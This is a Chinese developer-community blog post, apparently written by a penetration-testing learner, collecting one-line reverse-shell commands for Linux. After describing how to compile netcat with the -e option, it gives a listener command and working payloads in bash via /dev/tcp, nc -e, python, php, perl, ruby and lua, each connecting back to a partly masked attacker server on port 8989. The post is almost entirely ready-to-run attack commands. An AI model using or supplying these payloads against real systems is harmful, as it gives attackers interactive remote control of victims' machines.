开发者社区> spleated> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

linux一句话反弹shell

简介: 参考文献:https://www.anquanke.com/post/id/87017 实验环境: 阿里云服务器:120.xxx.xxx.xx(开启了8989端口) 内网ubuntu:192.xxx.xx.xxx(无外网ip不可直接访问) 安装netcat 默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e这里都被阉割了,所以需要手动下载二进制安装包。
+关注继续查看

参考文献:https://www.anquanke.com/post/id/87017

实验环境:

阿里云服务器:120.xxx.xxx.xx(开启了8989端口)
内网ubuntu:192.xxx.xx.xxx(无外网ip不可直接访问)

安装netcat

默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e这里都被阉割了,所以需要手动下载二进制安装包。

下载安装包:
#wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz --no-check-certifica
解压:
#tar -xvzf netcat-0.7.1.tar.gz
编译安装:
/netcat-0.7.1# ./configure
/netcat-0.7.1# make
/netcat-0.7.1# make install
/netcat-0.7.1# make clean

1.使用bash命令反弹

1.1先在服务器上监听8989端口
nc -l -p 8989
1.2在目标机器上执行以下命令

bash -i >& /dev/tcp/120.xxx.xxx.xx/8989 0>&1
bash -i:产生一个bash交互环境
>&:将联合符号前面的内容与后面相结合然后一起重定向给后者
/dev/tcp/120.xxx.xxx.xx/8989:让攻击方与目标主机建立tcp链接
0>&1:将`标准的输入`与`标准输出`内容相结合,然后重定向给前面`标准输出`内容

2.使用nc反弹

2.1先在服务器上监听8989端口
nc -l -p 8989
2.2在目标机器上执行以下命令
nc -e /bin/sh 120.xxx.xxx.xx 8989

3.一句话反弹shell

3.1python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.xxx.xxx.xxx",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

3.2php

php -r '$sock=fsockopen("120.xxx.xxx.xxx",8989);exec("/bin/sh -i <&3 >&3 2>&3");'

3.3perl

perl -e 'use Socket;$i="120.xxx.xxx.xxx";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

3.4ruby

ruby -rsocket -e'f=TCPSocket.open("120.xxx.xxx.xxx",8989).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

3.5lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('120.xxx.xxx.xxx','8989');os.execute('/bin/sh -i <&3 >&3 2>&3');"

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
反弹shell的N种姿势
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
335 0
如何用shell脚本编译java工程
    编译java工程一般直接用IDE或者用Ant、Maven之类的工具,很少有人用纯shell来编译java工程。正好遇到这样一个应该,用这篇博文做一下记录。     案例:本人用eclipse写了一个java project,然后编译打成jar包。
1063 0
通过shell脚本快速定位active session问题
如果你得到反馈,数据库突然间性能下降了好多,希望你能够尽快的定位出问题来,有一些思路和方法可以参考。分别从数据库层面,系统层面来定位,但是个人感觉而言还是不够快和准。
878 0
Linux Shell 脚本攻略 ---- 第八章 当个好管家
8.1 统计磁盘的使用情况      1 磁盘空间是一种有限资源      2 df和du是Linux中用于统计磁盘使用情况的重要命令,df是disk free的缩写,du是disk usage的缩写      3 找出某个文件(或多个文件)占用的磁盘空间: du file1 file2 .
901 0
+关注
spleated
渗透测试入门的小白一只
文章
问答
文章排行榜
最热
最新
相关电子书
更多
Shell 脚本速查手册
立即下载
ECS系统指南之Linux系统诊断
立即下载
Decian GNU/Linux安全合规之路
立即下载